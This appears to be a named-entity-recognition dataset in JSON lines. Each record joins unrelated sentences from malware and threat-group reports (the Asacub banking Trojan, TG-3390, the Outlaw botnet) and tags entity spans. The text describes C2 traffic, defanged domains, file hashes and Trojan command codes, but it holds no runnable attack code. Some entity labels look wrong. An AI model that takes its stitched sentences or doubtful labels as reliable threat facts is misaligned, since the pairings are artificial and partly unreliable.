The customers of these commercial spyware organizations know who their victim(s ) are .", "spans": [{"start": 122, "end": 142, "label": "Indicator"}, {"start": 145, "end": 148, "label": "Organization"}, {"start": 263, "end": 276, "label": "Organization"}, {"start": 292, "end": 301, "label": "Organization"}, {"start": 314, "end": 333, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 377, "end": 392, "label": "Organization"}, {"start": 397, "end": 406, "label": "Organization"}, {"start": 413, "end": 418, "label": "Organization"}, {"start": 510, "end": 516, "label": "System"}, {"start": 521, "end": 549, "label": "System"}, {"start": 697, "end": 729, "label": "Organization"}]} {"text": "In earlier versions , the something part of the relative path was a partially intelligible , yet random mix of words and short combinations of letters and numbers separated by an underscore , for example , \u201c bee_bomb \u201d or \u201c my_te2_mms \u201d . Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . This time , the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors . According to the Education Data Initiative , \" Public education spending in the United States falls short of global benchmarks and lags behind economic growth . 
\"", "spans": [{"start": 265, "end": 272, "label": "Organization"}, {"start": 310, "end": 314, "label": "System"}, {"start": 573, "end": 586, "label": "Vulnerability"}, {"start": 591, "end": 600, "label": "Vulnerability"}, {"start": 611, "end": 624, "label": "Vulnerability"}, {"start": 664, "end": 689, "label": "Organization"}]} {"text": "Example of traffic from an early version of Asacub ( 2015 ) The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites . Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 44, "end": 50, "label": "Malware"}, {"start": 364, "end": 367, "label": "Indicator"}, {"start": 372, "end": 378, "label": "Indicator"}, {"start": 393, "end": 416, "label": "Organization"}, {"start": 457, "end": 473, "label": "Organization"}]} {"text": "The C & C address and the encryption key ( one for different modifications in versions 4.x and 5.x , and distinct for different C & Cs in later versions ) are stitched into the body of the Trojan . After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims . While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered \u201c loud. \u201d These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server . Cisco Talos is aware of the recent advisory published by the U.S. 
Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": [{"start": 229, "end": 236, "label": "Organization"}, {"start": 250, "end": 270, "label": "System"}, {"start": 546, "end": 565, "label": "System"}, {"start": 583, "end": 594, "label": "Organization"}, {"start": 644, "end": 696, "label": "Organization"}, {"start": 735, "end": 753, "label": "Malware"}]} {"text": "In early versions of Asacub , .com , .biz , .info , .in , .pw were used as top-level domains . CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control . The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed . When ransomware source code or builders are leaked , it becomes easier for aspiring cybercriminals who lack the technical expertise to develop their own ransomware variants by making only minor modifications to the original code .", "spans": [{"start": 21, "end": 27, "label": "Malware"}, {"start": 95, "end": 98, "label": "Organization"}, {"start": 144, "end": 151, "label": "Organization"}, {"start": 410, "end": 460, "label": "Vulnerability"}]} {"text": "In the 2016 version , the value of the User-Agent header changed , as did the method of generating the relative path in the URL : now the part before /index.php is a mix of a pronounceable ( if not entirely meaningful ) word and random letters and numbers , for example , \u201c muromec280j9tqeyjy5sm1qy71 \u201d or \u201c parabbelumf8jgybdd6w0qa0 \u201d . TG-3390 uses the PlugX remote access tool . We also considered the move as an obfuscation technique , as it was mixed with a lot of script kiddie activities that can easily be mistaken for grey noise online . 
In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": [{"start": 274, "end": 300, "label": "Indicator"}, {"start": 308, "end": 332, "label": "Indicator"}, {"start": 337, "end": 344, "label": "Organization"}, {"start": 354, "end": 378, "label": "System"}, {"start": 567, "end": 576, "label": "Malware"}]} {"text": "Moreover , incoming traffic from the C & C server began to use gzip compression , and the top-level domain for all C & Cs was .com : Since December 2016 , the changes in C & C communication methods have affected only how the relative path in the URL is generated : the pronounceable word was replaced by a rather long random combination of letters and numbers , for example , \u201c ozvi4malen7dwdh \u201d or \u201c f29u8oi77024clufhw1u5ws62 \u201d . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China . The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times . 
Ashley Madison \u2019s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison \u2019s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": [{"start": 378, "end": 393, "label": "Indicator"}, {"start": 401, "end": 426, "label": "Indicator"}, {"start": 435, "end": 438, "label": "System"}, {"start": 498, "end": 517, "label": "Organization"}, {"start": 522, "end": 543, "label": "Organization"}, {"start": 748, "end": 762, "label": "Organization"}, {"start": 900, "end": 914, "label": "Organization"}, {"start": 959, "end": 993, "label": "System"}, {"start": 1036, "end": 1051, "label": "Organization"}]} {"text": "At the time of writing this article , no other significant changes in Asacub \u2019 s network behavior had been observed : The origin of Asacub It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps . The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities . From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) . 
We also want to specifically thank Google \u2019s Threat Analysis Group ( TAG ) , Mandiant \u2019s DPRK Fusion Cell , and our government partners for their continued collaboration and support .", "spans": [{"start": 70, "end": 76, "label": "Malware"}, {"start": 132, "end": 138, "label": "Malware"}, {"start": 173, "end": 179, "label": "Malware"}, {"start": 200, "end": 226, "label": "Indicator"}, {"start": 261, "end": 280, "label": "System"}, {"start": 414, "end": 436, "label": "System"}, {"start": 439, "end": 442, "label": "System"}, {"start": 632, "end": 671, "label": "Organization"}, {"start": 674, "end": 702, "label": "Organization"}]} {"text": "Communication between both Trojans and their C & C servers is based on the same principle , the relative addresses to which Trojans send network requests are generated in a similar manner , and the set of possible commands that the two Trojans can perform also overlaps . Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions . Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a \u201c whole kit \u201d of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via \u201c security through obscurity. \u201d They attempted to evade traffic inspection by encoding the code for the scanner with base-64 . 
In April 2021 , a new campaign by OilRig was discovered by researchers at Checkpoint in which the group employed a new backdoor variant dubbed SideTwist against what appears to be a Lebanese target .", "spans": [{"start": 283, "end": 286, "label": "Organization"}, {"start": 340, "end": 357, "label": "Organization"}, {"start": 490, "end": 493, "label": "System"}, {"start": 895, "end": 903, "label": "Organization"}, {"start": 907, "end": 913, "label": "Organization"}, {"start": 947, "end": 957, "label": "Organization"}, {"start": 1016, "end": 1025, "label": "Malware"}, {"start": 1055, "end": 1070, "label": "Organization"}]} {"text": "What \u2019 s more , the numbering of Asacub versions is a continuation of the Smaps system . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The zombie host initiates the scan \u2014 another routine from previous campaigns \u2014 but updated with a larger set of parameters and programmed to run in the background . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month \u2019s most active ransomware gang .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 74, "end": 79, "label": "Malware"}, {"start": 89, "end": 92, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 178, "end": 190, "label": "Organization"}, {"start": 308, "end": 327, "label": "Organization"}, {"start": 550, "end": 554, "label": "Organization"}, {"start": 602, "end": 609, "label": "Organization"}]} {"text": "The main difference is that Smaps transmits data as plain text , while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format . CTU researchers have observed the threat group obtaining information about specific U.S. 
defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The kit we found is in tgz format , though we have observed some samples disguised as png or jpg . Tools for phishing analysis and remediation that save security operations teams time and help find indicators of compromise across a sea of suspicious messages can also make a big difference in the fight against ransomware .", "spans": [{"start": 28, "end": 33, "label": "Malware"}, {"start": 71, "end": 77, "label": "Malware"}, {"start": 156, "end": 159, "label": "Organization"}, {"start": 240, "end": 252, "label": "Organization"}, {"start": 370, "end": 389, "label": "Organization"}]} {"text": "Let \u2019 s compare examples of traffic from Smaps and Asacub \u2014 an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { \u201c id \u201d : \u201d 532bf15a-b784-47e5-92fa-72198a2929f5\u2033 , \u201d type \u201d : \u201d get \u201d , \u201d info \u201d : \u201d imei:365548770159066 , country : PL , cell : Tele2 TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments . While previous routines took advantage of competing miners \u2019 activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files . 
After Kaspersky \u2019s reports of these attacks , the rest of 2013 saw reduced intensity of the campaign .", "spans": [{"start": 41, "end": 46, "label": "Malware"}, {"start": 51, "end": 57, "label": "Malware"}, {"start": 209, "end": 214, "label": "Malware"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 258, "end": 264, "label": "Malware"}, {"start": 288, "end": 325, "label": "Indicator"}, {"start": 413, "end": 420, "label": "Organization"}, {"start": 1048, "end": 1060, "label": "Organization"}, {"start": 1134, "end": 1142, "label": "Organization"}]} {"text": ", android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2\u2033 } Data sent to the server [ { \u201c command \u201d : \u201d sent & & & \u201d , \u201d params \u201d : { \u201c to \u201d : \u201d +79262000900\u2033 , \u201d body \u201d : \u201d \\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416 Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads . The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt . 
Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": [{"start": 295, "end": 302, "label": "System"}, {"start": 771, "end": 783, "label": "Organization"}, {"start": 825, "end": 858, "label": "Organization"}]} {"text": "1000 50\u2033 , \u201d timestamp \u201d : \u201d 1452272572\u2033 } } , { \u201c command \u201d : \u201d sent & & & \u201d , \u201d params \u201d : { \u201c to \u201d : \u201d +79262000900\u2033 , \u201d body \u201d : \u201d BALANCE \u201d , \u201d timestamp \u201d : \u201d 1452272573\u2033 } } ] Instructions received from the server A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS ( encoded with the base64 algorithm ) from the device to the C & C server : Smaps TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . The script then waits 20 minutes before it runs the wrapper script initall : The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": [{"start": 394, "end": 401, "label": "Organization"}, {"start": 450, "end": 453, "label": "Organization"}, {"start": 508, "end": 525, "label": "Vulnerability"}, {"start": 618, "end": 625, "label": "Indicator"}, {"start": 632, "end": 640, "label": "Malware"}, {"start": 709, "end": 718, "label": "System"}]} {"text": "format Asacub format Decrypted data from Asacub traffic : { \u201c data \u201d : \u201d 2015:10:14_02:41:15\u2033 , \u201d id \u201d : \u201d 532bf15a-b784-47e5-92fa-72198a2929f5\u2033 , \u201d text \u201d : \u201d SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= \u201d , \u201d number \u201d : \u201d 1790\u2033 , \u201d type In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims . 
2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a install . Utilizing multiple security solutions may become even more important as the level of sophistication in malware grows .", "spans": [{"start": 107, "end": 144, "label": "Indicator"}, {"start": 284, "end": 288, "label": "System"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 396, "end": 460, "label": "Indicator"}, {"start": 461, "end": 468, "label": "Indicator"}]} {"text": "\u201d : \u201d load \u201d } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS . After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought . Another variant executes a set of commands once a system is successfully compromised . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": [{"start": 203, "end": 206, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 483, "end": 490, "label": "Organization"}, {"start": 569, "end": 591, "label": "Organization"}, {"start": 603, "end": 611, "label": "Organization"}]} {"text": "The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device . Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . 
Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt . Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": [{"start": 154, "end": 157, "label": "Organization"}, {"start": 182, "end": 189, "label": "Organization"}, {"start": 291, "end": 313, "label": "Organization"}, {"start": 319, "end": 330, "label": "Organization"}, {"start": 554, "end": 559, "label": "System"}, {"start": 712, "end": 736, "label": "System"}]} {"text": "The Trojan download window Asacub masquerades under the guise of an MMS app or a client of a popular free ads service . Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions . In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed , indicating that this version is the updated iteration . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": [{"start": 27, "end": 33, "label": "Malware"}, {"start": 161, "end": 164, "label": "Organization"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 308, "end": 313, "label": "System"}, {"start": 470, "end": 477, "label": "Organization"}]} {"text": "We came across the names Photo , Message , Avito Offer , and MMS Message . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations . 
Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection . \u201c It appears to be the email address Will used for his profiles , \u201d the IT director replied .", "spans": [{"start": 75, "end": 78, "label": "Organization"}, {"start": 109, "end": 116, "label": "Organization"}, {"start": 159, "end": 185, "label": "Organization"}, {"start": 351, "end": 355, "label": "Organization"}, {"start": 386, "end": 397, "label": "Organization"}]} {"text": "App icons under which Asacub masks itself The APK files of the Trojan are downloaded from sites such as mmsprivate [ . CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) . If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 104, "end": 118, "label": "Indicator"}, {"start": 119, "end": 122, "label": "Organization"}, {"start": 180, "end": 197, "label": "System"}, {"start": 459, "end": 466, "label": "Organization"}, {"start": 638, "end": 650, "label": "Organization"}]} {"text": "] site , photolike [ . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars . Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running : However , a log file on the server indicates that the C2 framework has been active since at least September 2017 , and probably \" hosted on different servers over time . 
\"", "spans": [{"start": 9, "end": 22, "label": "Indicator"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 204, "end": 207, "label": "System"}, {"start": 224, "end": 228, "label": "Indicator"}, {"start": 233, "end": 238, "label": "Indicator"}, {"start": 288, "end": 312, "label": "Indicator"}, {"start": 328, "end": 390, "label": "Indicator"}, {"start": 397, "end": 445, "label": "Indicator"}]} {"text": "] fun , you-foto [ . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S . 0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 The utility is located in the \u201c \\sc\\prog\\exec \u201d folder within the MicroSCADA installation directory , amongst other utilities , libraries , and resources used by MicroSCADA .", "spans": [{"start": 8, "end": 20, "label": "Indicator"}, {"start": 21, "end": 28, "label": "Organization"}, {"start": 238, "end": 337, "label": "Indicator"}]} {"text": "] site , and mms4you [ . Using a U.S.-based C2 infrastructure ( see Figure 7 ) to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense . S-SHA2init . 
93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 For example , in its 2020 Internet Crime Report released in March , the FBI confirmed the total cost of attacks reported to the bureau in 2020 amounted to 29.1 million , an increase of more than 200 from the year before .", "spans": [{"start": 13, "end": 24, "label": "Indicator"}, {"start": 33, "end": 61, "label": "System"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 205, "end": 215, "label": "Indicator"}, {"start": 355, "end": 358, "label": "Organization"}]} {"text": "] me under names in the format : photo_ [ number ] _img.apk , mms_ [ number ] _img.apk avito_ [ number ] .apk , mms.img_ [ number ] _photo.apk , mms [ number ] _photo.image.apk , mms [ number ] _photo.img.apk , mms.img.photo_ [ number ] .apk , photo_ [ number ] _obmen.img.apk . The threat actors create PlugX DLL stub loaders that will run only after a specific date . S-SHA2init2 . To continue the home security analogy , if the window was nt left open , the attacker would likely have gone somewhere else , and the same principle applies in the digital world .", "spans": [{"start": 33, "end": 59, "label": "Indicator"}, {"start": 62, "end": 86, "label": "Indicator"}, {"start": 87, "end": 109, "label": "Indicator"}, {"start": 112, "end": 142, "label": "Indicator"}, {"start": 145, "end": 176, "label": "Indicator"}, {"start": 179, "end": 208, "label": "Indicator"}, {"start": 211, "end": 241, "label": "Indicator"}, {"start": 244, "end": 276, "label": "Indicator"}, {"start": 304, "end": 313, "label": "System"}, {"start": 370, "end": 381, "label": "Indicator"}, {"start": 461, "end": 469, "label": "Organization"}]} {"text": "For the Trojan to install , the user must allow installation of apps from unknown sources in the device settings . The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools . 
Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions . Budworm executes SysUpdate on victim networks by DLL sideloading the payload using the legitimate INISafeWebSSO application .", "spans": [{"start": 160, "end": 163, "label": "Organization"}, {"start": 301, "end": 305, "label": "Indicator"}, {"start": 310, "end": 315, "label": "Indicator"}, {"start": 470, "end": 477, "label": "Organization"}, {"start": 487, "end": 496, "label": "Malware"}, {"start": 568, "end": 593, "label": "System"}]} {"text": "Infection During installation , depending on the version of the Trojan , Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file . We also found the init0 script running ; the script cleans out all miners regardless of its origin . Additionally , Mandiant was able to uncover additional infrastructure due to the fact that a PTR record was never changed from a previous operation .", "spans": [{"start": 73, "end": 79, "label": "Malware"}, {"start": 215, "end": 218, "label": "Organization"}, {"start": 254, "end": 262, "label": "System"}, {"start": 329, "end": 350, "label": "System"}, {"start": 398, "end": 403, "label": "Indicator"}, {"start": 558, "end": 628, "label": "Indicator"}]} {"text": "After receiving the rights , it sets itself as the default SMS app and disappears from the device screen . CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) . It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab . 
CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 107, "end": 110, "label": "Organization"}, {"start": 344, "end": 345, "label": "Indicator"}, {"start": 348, "end": 353, "label": "Indicator"}, {"start": 420, "end": 440, "label": "Organization"}, {"start": 471, "end": 497, "label": "Organization"}, {"start": 552, "end": 584, "label": "System"}, {"start": 601, "end": 617, "label": "Vulnerability"}, {"start": 622, "end": 638, "label": "Vulnerability"}]} {"text": "If the user ignores or rejects the request , the window reopens every few seconds . TG-3390 sends spearphishing emails with ZIP archive attachments . The a binary is a script wrapper to start run , a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system . Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware \u2019s behavior .", "spans": [{"start": 84, "end": 91, "label": "Organization"}, {"start": 168, "end": 182, "label": "System"}, {"start": 200, "end": 222, "label": "System"}, {"start": 245, "end": 253, "label": "Malware"}, {"start": 295, "end": 317, "label": "Malware"}]} {"text": "The Trojan requests Device Administrator rights The Trojan requests permission to use AccessibilityService After installation , the Trojan starts communicating with the cybercriminals \u2019 C & C server . CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware . The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization . 
Anonymous Sudan has targeted organizations associated with infrastructure and key services , including in government and private sectors .", "spans": [{"start": 201, "end": 204, "label": "Organization"}, {"start": 231, "end": 238, "label": "Organization"}, {"start": 468, "end": 476, "label": "Malware"}, {"start": 554, "end": 559, "label": "System"}, {"start": 564, "end": 583, "label": "System"}, {"start": 638, "end": 653, "label": "Organization"}, {"start": 667, "end": 711, "label": "Organization"}, {"start": 716, "end": 728, "label": "Organization"}, {"start": 744, "end": 754, "label": "Organization"}, {"start": 759, "end": 774, "label": "Organization"}]} {"text": "All data is transmitted in JSON format ( after decryption ) . TG-3390 actors have used Java exploits in their SWCs . This allows the malicious activity to evade detection . The victims have been in the Americas , EMEA , and APJ as of writing .", "spans": [{"start": 62, "end": 69, "label": "Organization"}, {"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 110, "end": 114, "label": "System"}]} {"text": "It includes information about the smartphone model , the OS version , the mobile operator , and the Trojan version . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . The Shellbot script is added to run after the victim \u2019s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab . 
CozyDuke droppers and spyware components often maintain fairly common characteristics , but the files \u2019 functionality is slightly modified depending on the actor \u2019s needs .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 236, "end": 256, "label": "System"}, {"start": 263, "end": 276, "label": "Vulnerability"}, {"start": 298, "end": 303, "label": "System"}, {"start": 423, "end": 431, "label": "Malware"}, {"start": 568, "end": 576, "label": "Malware"}]} {"text": "Let \u2019 s take an in-depth look at Asacub 5.0.3 , the most widespread version in 2018 . In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS . However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits \u2019 latest version . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 110, "end": 113, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 149, "end": 185, "label": "System"}]} {"text": "Structure of data sent to the server : To begin with , the Trojan sends information about the device to the server : In response , the server sends the code of the command for execution ( \u201c command \u201d ) , its parameters ( \u201c params \u201d ) , and the time delay before execution ( \u201c waitrun \u201d in milliseconds ) . 
In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . It remains unclear whether these are leftover code from the previous versions or their particular purposes were served . As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": [{"start": 355, "end": 368, "label": "Vulnerability"}, {"start": 436, "end": 456, "label": "System"}, {"start": 463, "end": 476, "label": "Vulnerability"}, {"start": 498, "end": 503, "label": "System"}, {"start": 774, "end": 785, "label": "Organization"}, {"start": 905, "end": 932, "label": "Organization"}]} {"text": "List of commands sewn into the body of the Trojan : Command code Parameters Actions 2 \u2013 Sending a list of contacts from the address book of the infected device to the C & C server 7 \u201c to \u201d : int Calling the specified number 11 \u201c to \u201d : int , \u201c body \u201d : string Sending an SMS with the specified text to the specified number 19 \u201c text \u201d : string , \u201c n \u201d : string Sending SMS with the specified text to numbers from the address book of the infected device , with the name of the addressee from the TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL . Shellbot is also used to control the botnet , with a command that is sent and run from the C&C to determine if there is a code execution in the shell , the hostname , and its architecture . 
None Deploy advanced endpoint detection and response ( EDR ) tools to all endpoints to detect web services spawning PowerShell or command line processes .", "spans": [{"start": 124, "end": 136, "label": "System"}, {"start": 417, "end": 429, "label": "System"}, {"start": 495, "end": 502, "label": "Organization"}, {"start": 642, "end": 650, "label": "Malware"}, {"start": 679, "end": 685, "label": "Malware"}, {"start": 733, "end": 736, "label": "System"}]} {"text": "address book substituted into the message text 40 \u201c text \u201d : string Shutting down applications with specific names ( antivirus and banking applications ) The set of possible commands is the most significant difference between the various flavors of Asacub . CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 249, "end": 255, "label": "Malware"}, {"start": 258, "end": 261, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 505, "end": 511, "label": "Organization"}, {"start": 535, "end": 538, "label": "System"}, {"start": 553, "end": 569, "label": "Vulnerability"}, {"start": 593, "end": 596, "label": "Organization"}, {"start": 603, "end": 617, "label": "Vulnerability"}]} {"text": "In the 2015-early 2016 versions examined in this article , C & C instructions in JSON format contained the name of the command in text form ( \u201c get_sms \u201d , \u201c block_phone \u201d ) . 
The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system . We also found traces of Android Package Kits- ( APK- ) and Android Debug Bridge ( ADB )-based commands that enable cryptocurrency mining activities in Android-based TVs . The US Justice Department thinks he 's been deploying LockBit ransomware on victim networks both in the States and overseas , with the investigation having run from August 2020 through March 2023 .", "spans": [{"start": 226, "end": 231, "label": "System"}, {"start": 236, "end": 247, "label": "System"}, {"start": 297, "end": 318, "label": "System"}, {"start": 321, "end": 325, "label": "System"}, {"start": 332, "end": 352, "label": "System"}, {"start": 355, "end": 358, "label": "System"}, {"start": 424, "end": 441, "label": "System"}, {"start": 448, "end": 469, "label": "Organization"}, {"start": 498, "end": 516, "label": "Malware"}]} {"text": "In later versions , instead of the name of the command , its numerical code was transmitted . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed . For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence \u2019s website .", "spans": [{"start": 94, "end": 97, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 370, "end": 375, "label": "System"}]} {"text": "The same numerical code corresponded to one command in different versions , but the set of supported commands varied . 
